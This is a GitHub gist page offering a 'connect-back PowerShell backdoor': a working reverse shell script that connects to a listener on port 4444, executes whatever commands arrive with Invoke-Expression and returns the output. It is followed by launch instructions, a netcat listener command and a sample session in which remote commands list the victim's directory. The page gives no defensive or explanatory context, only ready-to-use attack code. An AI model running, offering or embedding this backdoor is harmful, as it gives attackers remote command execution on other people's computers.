Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
connect-back PowerShell backdoor
$addr = "localhost"
$port = 4444
$client = New-Object System.Net.Sockets.TcpClient ($addr, $port)
$stream = $client.GetStream()
$buffer = New-Object System.Byte[] $client.ReceiveBufferSize
$enc = New-Object System.Text.AsciiEncoding
try {
while ($TRUE) {
$bytes = $stream.Read($buffer, 0, $buffer.length)
if ($bytes -eq 0) {
break
}
$result = Invoke-Expression $enc.GetString($buffer, 0, $bytes) | Out-String
$result = $enc.GetBytes($result)
$stream.Write($result, 0, $result.length)
}
} catch {
# ignore exceptions
} finally {
$stream.Close()
}
$client.Close()
On client:
>powershell -ex remotesigned .\psbackdoor.ps1
On server:
$ nc -l 4444
pwd
Path
----
C:\cygwin64\tmp
ls
??????: C:\cygwin64\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 2015/11/17 22:33 838 psbackdoor.ps1
exit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.